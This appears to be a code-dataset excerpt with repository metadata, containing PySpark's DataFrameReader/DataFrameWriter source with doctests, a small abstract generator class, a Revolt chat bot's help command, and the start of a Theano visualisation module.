[('age', 'bigint'), ('name', 'string')]
"""
self._jreader = self._jreader.format(source)
return self
@since(1.4)
def schema(self, schema):
"""Specifies the input schema.
Some data sources (e.g. JSON) can infer the input schema automatically from data.
By specifying the schema here, the underlying data source can skip the schema
inference step, and thus speed up data loading.
:param schema: a :class:`pyspark.sql.types.StructType` object
"""
from pyspark.sql import SparkSession
if not isinstance(schema, StructType):
raise TypeError("schema should be StructType")
spark = SparkSession.builder.getOrCreate()
jschema = spark._jsparkSession.parseDataType(schema.json())
self._jreader = self._jreader.schema(jschema)
return self
@since(1.5)
def option(self, key, value):
"""Adds an input option for the underlying data source.
You can set the following option(s) for reading files:
* ``timeZone``: sets the string that indicates a timezone to be used to parse timestamps
in the JSON/CSV datasources or partition values.
If it isn't set, it uses the default value, session local timezone.
"""
self._jreader = self._jreader.option(key, to_str(value))
return self
@since(1.4)
def options(self, **options):
"""Adds input options for the underlying data source.
You can set the following option(s) for reading files:
* ``timeZone``: sets the string that indicates a timezone to be used to parse timestamps
in the JSON/CSV datasources or partition values.
If it isn't set, it uses the default value, session local timezone.
"""
for k in options:
self._jreader = self._jreader.option(k, to_str(options[k]))
return self
@since(1.4)
def load(self, path=None, format=None, schema=None, **options):
"""Loads data from a data source and returns it as a :class`DataFrame`.
:param path: optional string or a list of string for file-system backed data sources.
:param format: optional string for format of the data source. Default to 'parquet'.
:param schema: optional :class:`pyspark.sql.types.StructType` for the input schema.
:param options: all other string options
>>> df = spark.read.load('python/test_support/sql/parquet_partitioned', opt1=True,
... opt2=1, opt3='str')
>>> df.dtypes
[('name', 'string'), ('year', 'int'), ('month', 'int'), ('day', 'int')]
>>> df = spark.read.format('json').load(['python/test_support/sql/people.json',
... 'python/test_support/sql/people1.json'])
>>> df.dtypes
[('age', 'bigint'), ('aka', 'string'), ('name', 'string')]
"""
if format is not None:
self.format(format)
if schema is not None:
self.schema(schema)
self.options(**options)
if isinstance(path, basestring):
return self._df(self._jreader.load(path))
elif path is not None:
if type(path) != list:
path = [path]
return self._df(self._jreader.load(self._spark._sc._jvm.PythonUtils.toSeq(path)))
else:
return self._df(self._jreader.load())
@since(1.4)
def json(self, path, schema=None, primitivesAsString=None, prefersDecimal=None,
allowComments=None, allowUnquotedFieldNames=None, allowSingleQuotes=None,
allowNumericLeadingZero=None, allowBackslashEscapingAnyCharacter=None,
mode=None, columnNameOfCorruptRecord=None, dateFormat=None, timestampFormat=None,
multiLine=None):
"""
Loads JSON files and returns the results as a :class:`DataFrame`.
`JSON Lines <http://jsonlines.org/>`_ (newline-delimited JSON) is supported by default.
For JSON (one record per file), set the ``multiLine`` parameter to ``true``.
If the ``schema`` parameter is not specified, this function goes
through the input once to determine the input schema.
:param path: string represents path to the JSON dataset, or a list of paths,
or RDD of Strings storing JSON objects.
:param schema: an optional :class:`pyspark.sql.types.StructType` for the input schema.
:param primitivesAsString: infers all primitive values as a string type. If None is set,
it uses the default value, ``false``.
:param prefersDecimal: infers all floating-point values as a decimal type. If the values
do not fit in decimal, then it infers them as doubles. If None is
set, it uses the default value, ``false``.
:param allowComments: ignores Java/C++ style comment in JSON records. If None is set,
it uses the default value, ``false``.
:param allowUnquotedFieldNames: allows unquoted JSON field names. If None is set,
it uses the default value, ``false``.
:param allowSingleQuotes: allows single quotes in addition to double quotes. If None is
set, it uses the default value, ``true``.
:param allowNumericLeadingZero: allows leading zeros in numbers (e.g. 00012). If None is
set, it uses the default value, ``false``.
:param allowBackslashEscapingAnyCharacter: allows accepting quoting of all character
using backslash quoting mechanism. If None is
set, it uses the default value, ``false``.
:param mode: allows a mode for dealing with corrupt records during parsing. If None is
set, it uses the default value, ``PERMISSIVE``.
* ``PERMISSIVE`` : sets other fields to ``null`` when it meets a corrupted \
record, and puts the malformed string into a field configured by \
``columnNameOfCorruptRecord``. To keep corrupt records, an user can set \
a string type field named ``columnNameOfCorruptRecord`` in an user-defined \
schema. If a schema does not have the field, it drops corrupt records during \
parsing. When inferring a schema, it implicitly adds a \
``columnNameOfCorruptRecord`` field in an output schema.
* ``DROPMALFORMED`` : ignores the whole corrupted records.
* ``FAILFAST`` : throws an exception when it meets corrupted records.
:param columnNameOfCorruptRecord: allows renaming the new field having malformed string
created by ``PERMISSIVE`` mode. This overrides
``spark.sql.columnNameOfCorruptRecord``. If None is set,
it uses the value specified in
``spark.sql.columnNameOfCorruptRecord``.
:param dateFormat: sets the string that indicates a date format. Custom date formats
follow the formats at ``java.text.SimpleDateFormat``. This
applies to date type. If None is set, it uses the
default value, ``yyyy-MM-dd``.
:param timestampFormat: sets the string that indicates a timestamp format. Custom date
formats follow the formats at ``java.text.SimpleDateFormat``.
This applies to timestamp type. If None is set, it uses the
default value, ``yyyy-MM-dd'T'HH:mm:ss.SSSXXX``.
:param multiLine: parse one record, which may span multiple lines, per file. If None is
set, it uses the default value, ``false``.
>>> df1 = spark.read.json('python/test_support/sql/people.json')
>>> df1.dtypes
[('age', 'bigint'), ('name', 'string')]
>>> rdd = sc.textFile('python/test_support/sql/people.json')
>>> df2 = spark.read.json(rdd)
>>> df2.dtypes
[('age', 'bigint'), ('name', 'string')]
"""
self._set_opts(
schema=schema, primitivesAsString=primitivesAsString, prefersDecimal=prefersDecimal,
allowComments=allowComments, allowUnquotedFieldNames=allowUnquotedFieldNames,
allowSingleQuotes=allowSingleQuotes, allowNumericLeadingZero=allowNumericLeadingZero,
allowBackslashEscapingAnyCharacter=allowBackslashEscapingAnyCharacter,
mode=mode, columnNameOfCorruptRecord=columnNameOfCorruptRecord, dateFormat=dateFormat,
timestampFormat=timestampFormat, multiLine=multiLine)
if isinstance(path, basestring):
path = [path]
if type(path) == list:
return self._df(self._jreader.json(self._spark._sc._jvm.PythonUtils.toSeq(path)))
elif isinstance(path, RDD):
def func(iterator):
for x in iterator:
if not isinstance(x, basestring):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = path.mapPartitions(func)
keyed._bypass_serializer = True
jrdd = keyed._jrdd.map(self._spark._jvm.BytesToString())
return self._df(self._jreader.json(jrdd))
else:
raise TypeError("path can be only string, list or RDD")
@since(1.4)
def table(self, tableName):
"""Returns the specified table as a :class:`DataFrame`.
:param tableName: string, name of the table.
>>> df = spark.read.parquet('python/test_support/sql/parquet_partitioned')
>>> df.createOrReplaceTempView('tmpTable')
>>> spark.read.table('tmpTable').dtypes
[('name', 'string'), ('year', 'int'), ('month', 'int'), ('day', 'int')]
"""
return self._df(self._jreader.table(tableName))
@since(1.4)
def parquet(self, *paths):
"""Loads Parquet files, returning the result as a :class:`DataFrame`.
You can set the following Parquet-specific option(s) for reading Parquet files:
* ``mergeSchema``: sets whether we should merge schemas collected from all \
Parquet part-files. This will override ``spark.sql.parquet.mergeSchema``. \
The default value is specified in ``spark.sql.parquet.mergeSchema``.
>>> df = spark.read.parquet('python/test_support/sql/parquet_partitioned')
>>> df.dtypes
[('name', 'string'), ('year', 'int'), ('month', 'int'), ('day', 'int')]
"""
return self._df(self._jreader.parquet(_to_seq(self._spark._sc, paths)))
@ignore_unicode_prefix
@since(1.6)
def text(self, paths):
"""
Loads text files and returns a :class:`DataFrame` whose schema starts with a
string column named "value", and followed by partitioned columns if there
are any.
Each line in the text file is a new row in the resulting DataFrame.
:param paths: string, or list of strings, for input path(s).
>>> df = spark.read.text('python/test_support/sql/text-test.txt')
>>> df.collect()
[Row(value=u'hello'), Row(value=u'this')]
"""
if isinstance(paths, basestring):
paths = [paths]
return self._df(self._jreader.text(self._spark._sc._jvm.PythonUtils.toSeq(paths)))
@since(2.0)
def csv(self, path, schema=None, sep=None, encoding=None, quote=None, escape=None,
comment=None, header=None, inferSchema=None, ignoreLeadingWhiteSpace=None,
ignoreTrailingWhiteSpace=None, nullValue=None, nanValue=None, positiveInf=None,
negativeInf=None, dateFormat=None, timestampFormat=None, maxColumns=None,
maxCharsPerColumn=None, maxMalformedLogPerPartition=None, mode=None,
columnNameOfCorruptRecord=None, multiLine=None):
"""Loads a CSV file and returns the result as a :class:`DataFrame`.
This function will go through the input once to determine the input schema if
``inferSchema`` is enabled. To avoid going through the entire data once, disable
``inferSchema`` option or specify the schema explicitly using ``schema``.
:param path: string, or list of strings, for input path(s).
:param schema: an optional :class:`pyspark.sql.types.StructType` for the input schema.
:param sep: sets the single character as a separator for each field and value.
If None is set, it uses the default value, ``,``.
:param encoding: decodes the CSV files by the given encoding type. If None is set,
it uses the default value, ``UTF-8``.
:param quote: sets the single character used for escaping quoted values where the
separator can be part of the value. If None is set, it uses the default
value, ``"``. If you would like to turn off quotations, you need to set an
empty string.
:param escape: sets the single character used for escaping quotes inside an already
quoted value. If None is set, it uses the default value, ``\``.
:param comment: sets the single character used for skipping lines beginning with this
character. By default (None), it is disabled.
:param header: uses the first line as names of columns. If None is set, it uses the
default value, ``false``.
:param inferSchema: infers the input schema automatically from data. It requires one extra
pass over the data. If None is set, it uses the default value, ``false``.
:param ignoreLeadingWhiteSpace: A flag indicating whether or not leading whitespaces from
values being read should be skipped. If None is set, it
uses the default value, ``false``.
:param ignoreTrailingWhiteSpace: A flag indicating whether or not trailing whitespaces from
values being read should be skipped. If None is set, it
uses the default value, ``false``.
:param nullValue: sets the string representation of a null value. If None is set, it uses
the default value, empty string. Since 2.0.1, this ``nullValue`` param
applies to all supported types including the string type.
:param nanValue: sets the string representation of a non-number value. If None is set, it
uses the default value, ``NaN``.
:param positiveInf: sets the string representation of a positive infinity value. If None
is set, it uses the default value, ``Inf``.
:param negativeInf: sets the string representation of a negative infinity value. If None
is set, it uses the default value, ``Inf``.
:param dateFormat: sets the string that indicates a date format. Custom date formats
follow the formats at ``java.text.SimpleDateFormat``. This
applies to date type. If None is set, it uses the
default value, ``yyyy-MM-dd``.
:param timestampFormat: sets the string that indicates a timestamp format. Custom date
formats follow the formats at ``java.text.SimpleDateFormat``.
This applies to timestamp type. If None is set, it uses the
default value, ``yyyy-MM-dd'T'HH:mm:ss.SSSXXX``.
:param maxColumns: defines a hard limit of how many columns a record can have. If None is
set, it uses the default value, ``20480``.
:param maxCharsPerColumn: defines the maximum number of characters allowed for any given
value being read. If None is set, it uses the default value,
``-1`` meaning unlimited length.
:param maxMalformedLogPerPartition: this parameter is no longer used since Spark 2.2.0.
If specified, it is ignored.
:param mode: allows a mode for dealing with corrupt records during parsing. If None is
set, it uses the default value, ``PERMISSIVE``.
* ``PERMISSIVE`` : sets other fields to ``null`` when it meets a corrupted \
record, and puts the malformed string into a field configured by \
``columnNameOfCorruptRecord``. To keep corrupt records, an user can set \
a string type field named ``columnNameOfCorruptRecord`` in an \
user-defined schema. If a schema does not have the field, it drops corrupt \
records during parsing. When a length of parsed CSV tokens is shorter than \
an expected length of a schema, it sets `null` for extra fields.
* ``DROPMALFORMED`` : ignores the whole corrupted records.
* ``FAILFAST`` : throws an exception when it meets corrupted records.
:param columnNameOfCorruptRecord: allows renaming the new field having malformed string
created by ``PERMISSIVE`` mode. This overrides
``spark.sql.columnNameOfCorruptRecord``. If None is set,
it uses the value specified in
``spark.sql.columnNameOfCorruptRecord``.
:param multiLine: parse records, which may span multiple lines. If None is
set, it uses the default value, ``false``.
>>> df = spark.read.csv('python/test_support/sql/ages.csv')
>>> df.dtypes
[('_c0', 'string'), ('_c1', 'string')]
"""
self._set_opts(
schema=schema, sep=sep, encoding=encoding, quote=quote, escape=escape, comment=comment,
header=header, inferSchema=inferSchema, ignoreLeadingWhiteSpace=ignoreLeadingWhiteSpace,
ignoreTrailingWhiteSpace=ignoreTrailingWhiteSpace, nullValue=nullValue,
nanValue=nanValue, positiveInf=positiveInf, negativeInf=negativeInf,
dateFormat=dateFormat, timestampFormat=timestampFormat, maxColumns=maxColumns,
maxCharsPerColumn=maxCharsPerColumn,
maxMalformedLogPerPartition=maxMalformedLogPerPartition, mode=mode,
columnNameOfCorruptRecord=columnNameOfCorruptRecord, multiLine=multiLine)
if isinstance(path, basestring):
path = [path]
return self._df(self._jreader.csv(self._spark._sc._jvm.PythonUtils.toSeq(path)))
@since(1.5)
def orc(self, path):
"""Loads ORC files, returning the result as a :class:`DataFrame`.
.. note:: Currently ORC support is only available together with Hive support.
>>> df = spark.read.orc('python/test_support/sql/orc_partitioned')
>>> df.dtypes
[('a', 'bigint'), ('b', 'int'), ('c', 'int')]
"""
if isinstance(path, basestring):
path = [path]
return self._df(self._jreader.orc(_to_seq(self._spark._sc, path)))
@since(1.4)
def jdbc(self, url, table, column=None, lowerBound=None, upperBound=None, numPartitions=None,
predicates=None, properties=None):
"""
Construct a :class:`DataFrame` representing the database table named ``table``
accessible via JDBC URL ``url`` and connection ``properties``.
Partitions of the table will be retrieved in parallel if either ``column`` or
``predicates`` is specified. ``lowerBound`, ``upperBound`` and ``numPartitions``
is needed when ``column`` is specified.
If both ``column`` and ``predicates`` are specified, ``column`` will be used.
.. note:: Don't create too many partitions in parallel on a large cluster; \
otherwise Spark might crash your external database systems.
:param url: a JDBC URL of the form ``jdbc:subprotocol:subname``
:param table: the name of the table
:param column: the name of an integer column that will be used for partitioning;
if this parameter is specified, then ``numPartitions``, ``lowerBound``
(inclusive), and ``upperBound`` (exclusive) will form partition strides
for generated WHERE clause expressions used to split the column
``column`` evenly
:param lowerBound: the minimum value of ``column`` used to decide partition stride
:param upperBound: the maximum value of ``column`` used to decide partition stride
:param numPartitions: the number of partitions
:param predicates: a list of expressions suitable for inclusion in WHERE clauses;
each one defines one partition of the :class:`DataFrame`
:param properties: a dictionary of JDBC database connection arguments. Normally at
least properties "user" and "password" with their corresponding values.
For example { 'user' : 'SYSTEM', 'password' : 'mypassword' }
:return: a DataFrame
"""
if properties is None:
properties = dict()
jprop = JavaClass("java.util.Properties", self._spark._sc._gateway._gateway_client)()
for k in properties:
jprop.setProperty(k, properties[k])
if column is not None:
assert lowerBound is not None, "lowerBound can not be None when ``column`` is specified"
assert upperBound is not None, "upperBound can not be None when ``column`` is specified"
assert numPartitions is not None, \
"numPartitions can not be None when ``column`` is specified"
return self._df(self._jreader.jdbc(url, table, column, int(lowerBound), int(upperBound),
int(numPartitions), jprop))
if predicates is not None:
gateway = self._spark._sc._gateway
jpredicates = utils.toJArray(gateway, gateway.jvm.java.lang.String, predicates)
return self._df(self._jreader.jdbc(url, table, jpredicates, jprop))
return self._df(self._jreader.jdbc(url, table, jprop))
class DataFrameWriter(OptionUtils):
"""
Interface used to write a :class:`DataFrame` to external storage systems
(e.g. file systems, key-value stores, etc). Use :func:`DataFrame.write`
to access this.
.. versionadded:: 1.4
"""
def __init__(self, df):
self._df = df
self._spark = df.sql_ctx
self._jwrite = df._jdf.write()
def _sq(self, jsq):
from pyspark.sql.streaming import StreamingQuery
return StreamingQuery(jsq)
@since(1.4)
def mode(self, saveMode):
"""Specifies the behavior when data or table already exists.
Options include:
* `append`: Append contents of this :class:`DataFrame` to existing data.
* `overwrite`: Overwrite existing data.
* `error`: Throw an exception if data already exists.
* `ignore`: Silently ignore this operation if data already exists.
>>> df.write.mode('append').parquet(os.path.join(tempfile.mkdtemp(), 'data'))
"""
# At the JVM side, the default value of mode is already set to "error".
# So, if the given saveMode is None, we will not call JVM-side's mode method.
if saveMode is not None:
self._jwrite = self._jwrite.mode(saveMode)
return self
@since(1.4)
def format(self, source):
"""Specifies the underlying output data source.
:param source: string, name of the data source, e.g. 'json', 'parquet'.
>>> df.write.format('json').save(os.path.join(tempfile.mkdtemp(), 'data'))
"""
self._jwrite = self._jwrite.format(source)
return self
@since(1.5)
def option(self, key, value):
"""Adds an output option for the underlying data source.
You can set the following option(s) for writing files:
* ``timeZone``: sets the string that indicates a timezone to be used to format
timestamps in the JSON/CSV datasources or partition values.
If it isn't set, it uses the default value, session local timezone.
"""
self._jwrite = self._jwrite.option(key, to_str(value))
return self
@since(1.4)
def options(self, **options):
"""Adds output options for the underlying data source.
You can set the following option(s) for writing files:
* ``timeZone``: sets the string that indicates a timezone to be used to format
timestamps in the JSON/CSV datasources or partition values.
If it isn't set, it uses the default value, session local timezone.
"""
for k in options:
self._jwrite = self._jwrite.option(k, to_str(options[k]))
return self
@since(1.4)
def partitionBy(self, *cols):
"""Partitions the output by the given columns on the file system.
If specified, the output is laid out on the file system similar
to Hive's partitioning scheme.
:param cols: name of columns
>>> df.write.partitionBy('year', 'month').parquet(os.path.join(tempfile.mkdtemp(), 'data'))
"""
if len(cols) == 1 and isinstance(cols[0], (list, tuple)):
cols = cols[0]
self._jwrite = self._jwrite.partitionBy(_to_seq(self._spark._sc, cols))
return self
@since(1.4)
def save(self, path=None, format=None, mode=None, partitionBy=None, **options):
"""Saves the contents of the :class:`DataFrame` to a data source.
The data source is specified by the ``format`` and a set of ``options``.
If ``format`` is not specified, the default data source configured by
``spark.sql.sources.default`` will be used.
:param path: the path in a Hadoop supported file system
:param format: the format used to save
:param mode: specifies the behavior of the save operation when data already exists.
* ``append``: Append contents of this :class:`DataFrame` to existing data.
* ``overwrite``: Overwrite existing data.
* ``ignore``: Silently ignore this operation if data already exists.
* ``error`` (default case): Throw an exception if data already exists.
:param partitionBy: names of partitioning columns
:param options: all other string options
>>> df.write.mode('append').parquet(os.path.join(tempfile.mkdtemp(), 'data'))
"""
self.mode(mode).options(**options)
if partitionBy is not None:
self.partitionBy(partitionBy)
if format is not None:
self.format(format)
if path is None:
self._jwrite.save()
else:
self._jwrite.save(path)
@since(1.4)
def insertInto(self, tableName, overwrite=False):
"""Inserts the content of the :class:`DataFrame` to the specified table.
It requires that the schema of the class:`DataFrame` is the same as the
schema of the table.
Optionally overwriting any existing data.
"""
self._jwrite.mode("overwrite" if overwrite else "append").insertInto(tableName)
@since(1.4)
def saveAsTable(self, name, format=None, mode=None, partitionBy=None, **options):
"""Saves the content of the :class:`DataFrame` as the specified table.
In the case the table already exists, behavior of this function depends on the
save mode, specified by the `mode` function (default to throwing an exception).
When `mode` is `Overwrite`, the schema of the :class:`DataFrame` does not need to be
the same as that of the existing table.
* `append`: Append contents of this :class:`DataFrame` to existing data.
* `overwrite`: Overwrite existing data.
* `error`: Throw an exception if data already exists.
* `ignore`: Silently ignore this operation if data already exists.
:param name: the table name
:param format: the format used to save
:param mode: one of `append`, `overwrite`, `error`, `ignore` (default: error)
:param partitionBy: names of partitioning columns
:param options: all other string options
"""
self.mode(mode).options(**options)
if partitionBy is not None:
self.partitionBy(partitionBy)
if format is not None:
self.format(format)
self._jwrite.saveAsTable(name)
@since(1.4)
def json(self, path, mode=None, compression=None, dateFormat=None, timestampFormat=None):
"""Saves the content of the :class:`DataFrame` in JSON format
(`JSON Lines text format or newline-delimited JSON <http://jsonlines.org/>`_) at the
specified path.
:param path: the path in any Hadoop supported file system
:param mode: specifies the behavior of the save operation when data already exists.
* ``append``: Append contents of this :class:`DataFrame` to existing data.
* ``overwrite``: Overwrite existing data.
* ``ignore``: Silently ignore this operation if data already exists.
* ``error`` (default case): Throw an exception if data already exists.
:param compression: compression codec to use when saving to file. This can be one of the
known case-insensitive shorten names (none, bzip2, gzip, lz4,
snappy and deflate).
:param dateFormat: sets the string that indicates a date format. Custom date formats
follow the formats at ``java.text.SimpleDateFormat``. This
applies to date type. If None is set, it uses the
default value, ``yyyy-MM-dd``.
:param timestampFormat: sets the string that indicates a timestamp format. Custom date
formats follow the formats at ``java.text.SimpleDateFormat``.
This applies to timestamp type. If None is set, it uses the
default value, ``yyyy-MM-dd'T'HH:mm:ss.SSSXXX``.
>>> df.write.json(os.path.join(tempfile.mkdtemp(), 'data'))
"""
self.mode(mode)
self._set_opts(
compression=compression, dateFormat=dateFormat, timestampFormat=timestampFormat)
self._jwrite.json(path)
@since(1.4)
def parquet(self, path, mode=None, partitionBy=None, compression=None):
"""Saves the content of the :class:`DataFrame` in Parquet format at the specified path.
:param path: the path in any Hadoop supported file system
:param mode: specifies the behavior of the save operation when data already exists.
* ``append``: Append contents of this :class:`DataFrame` to existing data.
* ``overwrite``: Overwrite existing data.
* ``ignore``: Silently ignore this operation if data already exists.
* ``error`` (default case): Throw an exception if data already exists.
:param partitionBy: names of partitioning columns
:param compression: compression codec to use when saving to file. This can be one of the
known case-insensitive shorten names (none, snappy, gzip, and lzo).
This will override ``spark.sql.parquet.compression.codec``. If None
is set, it uses the value specified in
``spark.sql.parquet.compression.codec``.
>>> df.write.parquet(os.path.join(tempfile.mkdtemp(), 'data'))
"""
self.mode(mode)
if partitionBy is not None:
self.partitionBy(partitionBy)
self._set_opts(compression=compression)
self._jwrite.parquet(path)
@since(1.6)
def text(self, path, compression=None):
"""Saves the content of the DataFrame in a text file at the specified path.
:param path: the path in any Hadoop supported file system
:param compression: compression codec to use when saving to file. This can be one of the
known case-insensitive shorten names (none, bzip2, gzip, lz4,
snappy and deflate).
The DataFrame must have only one column that is of string type.
Each row becomes a new line in the output file.
"""
self._set_opts(compression=compression)
self._jwrite.text(path)
@since(2.0)
def csv(self, path, mode=None, compression=None, sep=None, quote=None, escape=None,
header=None, nullValue=None, escapeQuotes=None, quoteAll=None, dateFormat=None,
timestampFormat=None, ignoreLeadingWhiteSpace=None, ignoreTrailingWhiteSpace=None):
"""Saves the content of the :class:`DataFrame` in CSV format at the specified path.
:param path: the path in any Hadoop supported file system
:param mode: specifies the behavior of the save operation when data already exists.
* ``append``: Append contents of this :class:`DataFrame` to existing data.
* ``overwrite``: Overwrite existing data.
* ``ignore``: Silently ignore this operation if data already exists.
* ``error`` (default case): Throw an exception if data already exists.
:param compression: compression codec to use when saving to file. This can be one of the
known case-insensitive shorten names (none, bzip2, gzip, lz4,
snappy and deflate).
:param sep: sets the single character as a separator for each field and value. If None is
set, it uses the default value, ``,``.
:param quote: sets the single character used for escaping quoted values where the
separator can be part of the value. If None is set, it uses the default
value, ``"``. If you would like to turn off quotations, you need to set an
empty string.
:param escape: sets the single character used for escaping quotes inside an already
quoted value. If None is set, it uses the default value, ``\``
:param escapeQuotes: a flag indicating whether values containing quotes should always
be enclosed in quotes. If None is set, it uses the default value
``true``, escaping all values containing a quote character.
:param quoteAll: a flag indicating whether all values should always be enclosed in
quotes. If None is set, it uses the default value ``false``,
only escaping values containing a quote character.
:param header: writes the names of columns as the first line. If None is set, it uses
the default value, ``false``.
:param nullValue: sets the string representation of a null value. If None is set, it uses
the default value, empty string.
:param dateFormat: sets the string that indicates a date format. Custom date formats
follow the formats at ``java.text.SimpleDateFormat``. This
applies to date type. If None is set, it uses the
default value, ``yyyy-MM-dd``.
:param timestampFormat: sets the string that indicates a timestamp format. Custom date
formats follow the formats at ``java.text.SimpleDateFormat``.
This applies to timestamp type. If None is set, it uses the
default value, ``yyyy-MM-dd'T'HH:mm:ss.SSSXXX``.
:param ignoreLeadingWhiteSpace: a flag indicating whether or not leading whitespaces from
values being written should be skipped. If None is set, it
uses the default value, ``true``.
:param ignoreTrailingWhiteSpace: a flag indicating whether or not trailing whitespaces from
values being written should be skipped. If None is set, it
uses the default value, ``true``.
>>> df.write.csv(os.path.join(tempfile.mkdtemp(), 'data'))
"""
self.mode(mode)
self._set_opts(compression=compression, sep=sep, quote=quote, escape=escape, header=header,
nullValue=nullValue, escapeQuotes=escapeQuotes, quoteAll=quoteAll,
dateFormat=dateFormat, timestampFormat=timestampFormat,
ignoreLeadingWhiteSpace=ignoreLeadingWhiteSpace,
ignoreTrailingWhiteSpace=ignoreTrailingWhiteSpace)
self._jwrite.csv(path)
@since(1.5)
def orc(self, path, mode=None, partitionBy=None, compression=None):
"""Saves the content of the :class:`DataFrame` in ORC format at the specified path.
.. note:: Currently ORC support is only available together with Hive support.
:param path: the path in any Hadoop supported file system
:param mode: specifies the behavior of the save operation when data already exists.
* ``append``: Append contents of this :class:`DataFrame` to existing data.
* ``overwrite``: Overwrite existing data.
* ``ignore``: Silently ignore this operation if data already exists.
* ``error`` (default case): Throw an exception if data already exists.
:param partitionBy: names of partitioning columns
:param compression: compression codec to use when saving to file. This can be one of the
known case-insensitive shorten names (none, snappy, zlib, and lzo).
This will override ``orc.compress``. If None is set, it uses the
default value, ``snappy``.
>>> orc_df = spark.read.orc('python/test_support/sql/orc_partitioned')
>>> orc_df.write.orc(os.path.join(tempfile.mkdtemp(), 'data'))
"""
self.mode(mode)
if partitionBy is not None:
self.partitionBy(partitionBy)
self._set_opts(compression=compression)
self._jwrite.orc(path)
@since(1.4)
def jdbc(self, url, table, mode=None, properties=None):
"""Saves the content of the :class:`DataFrame` to an external database table via JDBC.
.. note:: Don't create too many partitions in parallel on a large cluster; \
otherwise Spark might crash your external database systems.
:param url: a JDBC URL of the form ``jdbc:subprotocol:subname``
:param table: Name of the table in the external database.
:param mode: specifies the behavior of the save operation when data already exists.
* ``append``: Append contents of this :class:`DataFrame` to existing data.
* ``overwrite``: Overwrite existing data.
* ``ignore``: Silently ignore this operation if data already exists.
* ``error`` (default case): Throw an exception if data already exists.
:param properties: a dictionary of JDBC database connection arguments. Normally at
least properties "user" and "password" with their corresponding values.
For example { 'user' : 'SYSTEM', 'password' : 'mypassword' }
"""
if properties is None:
properties = dict()
jprop = JavaClass("java.util.Properties", self._spark._sc._gateway._gateway_client)()
for k in properties:
jprop.setProperty(k, properties[k])
self._jwrite.mode(mode).jdbc(url, table, jprop)
def _test():
import doctest
import os
import tempfile
import py4j
from pyspark.context import SparkContext
from pyspark.sql import SparkSession, Row
import pyspark.sql.readwriter
os.chdir(os.environ["SPARK_HOME"])
globs = pyspark.sql.readwriter.__dict__.copy()
sc = SparkContext('local[4]', 'PythonTest')
try:
spark = SparkSession.builder.enableHiveSupport().getOrCreate()
except py4j.protocol.Py4JError:
spark = SparkSession(sc)
globs['tempfile'] = tempfile
globs['os'] = os
globs['sc'] = sc
globs['spark'] = spark
globs['df'] = spark.read.parquet('python/test_support/sql/parquet_partitioned')
(failure_count, test_count) = doctest.testmod(
pyspark.sql.readwriter, globs=globs,
optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE | doctest.REPORT_NDIFF)
sc.stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
| 51.496495
| 100
| 0.615685
|
6bf3e7adb6861c0e45c4fb4baded969d29c021ca
| 1,024
|
py
|
Python
|
whitfield/gen/__init__.py
|
npmccallum/whitfield
|
fdbc0c6444cb3b3b48351224525543171d0c60a4
|
[
"Apache-2.0"
] | null | null | null |
whitfield/gen/__init__.py
|
npmccallum/whitfield
|
fdbc0c6444cb3b3b48351224525543171d0c60a4
|
[
"Apache-2.0"
] | null | null | null |
whitfield/gen/__init__.py
|
npmccallum/whitfield
|
fdbc0c6444cb3b3b48351224525543171d0c60a4
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright: 2017 Red Hat, Inc.
# Author: Nathaniel McCallum <npmccallum@redhat.com>
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import abc
class Generator(abc.ABC):
@abc.abstractmethod
def __call__(self, ast):
"Generates output from the AST. Yields lines."
| 34.133333
| 62
| 0.75293
|
9926e36731cae6a20951ddc04fe23f008aefdad6
| 1,560
|
py
|
Python
|
revoltCommands/help.py
|
asoji/Yiski
|
8c64a04bb4e3b3f72a70de28203be2c3618c5f9c
|
[
"MIT"
] | null | null | null |
revoltCommands/help.py
|
asoji/Yiski
|
8c64a04bb4e3b3f72a70de28203be2c3618c5f9c
|
[
"MIT"
] | 11
|
2022-01-27T08:02:41.000Z
|
2022-02-10T23:32:29.000Z
|
revoltCommands/help.py
|
asoji/Yiski
|
8c64a04bb4e3b3f72a70de28203be2c3618c5f9c
|
[
"MIT"
] | 1
|
2022-01-27T06:11:48.000Z
|
2022-01-27T06:11:48.000Z
|
import defectio
from defectio import ext
from defectio.ext import commands
from loguru import logger
from mainRevolt import botPrefix
class HelpRevolt(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def help(self, ctx):
await ctx.reply(
"| Command Name | Description | Command |\n" +
"|-----------------| ------------------------------------|-------------------------------------------------|\n" +
f"| **hello** | Hello Command | {botPrefix}hello |\n" +
f"| **httpcat** | HTTP Cats go brrr | {botPrefix}httpcat [http code] |\n" +
f"| **ghr** | Preview a Github Repo | {botPrefix}ghr [username/orgname] [reponame]|\n" +
f"| **memoryleak** | SEGFAULT moment. | {botPrefix}memoryleak |\n" +
f"| **gasp** | Just find out for yourself. | {botPrefix}gasp |\n" +
f"| **token** | So about that funky config.toml... | {botPrefix}token |\n\n" +
"Bot writen by **HiItsDevin_**, powered by **[defectio](https://github.com/Darkflame72/defectio)**, a Revolt Python bot library. Written with 💖!",
mention=True)
def setup(bot):
bot.add_cog(HelpRevolt(bot))
logger.debug("Help Cog loaded.")
| 50.322581
| 158
| 0.444872
|
5e7829faace32049e6eb23d942b397979a177100
| 12,029
|
py
|
Python
|
theano/d3viz/formatting.py
|
michaelosthege/aesara
|
55c88832ba71f87c9612d573ede74a4c042ef570
|
[
"BSD-3-Clause"
] | null | null | null |
theano/d3viz/formatting.py
|
michaelosthege/aesara
|
55c88832ba71f87c9612d573ede74a4c042ef570
|
[
"BSD-3-Clause"
] | null | null | null |
theano/d3viz/formatting.py
|
michaelosthege/aesara
|
55c88832ba71f87c9612d573ede74a4c042ef570
|
[
"BSD-3-Clause"
] | null | null | null |
"""Functions for formatting Theano compute graphs.
Author: Christof Angermueller <cangermueller@gmail.com>
"""
import os
from functools import reduce
import numpy as np
import theano
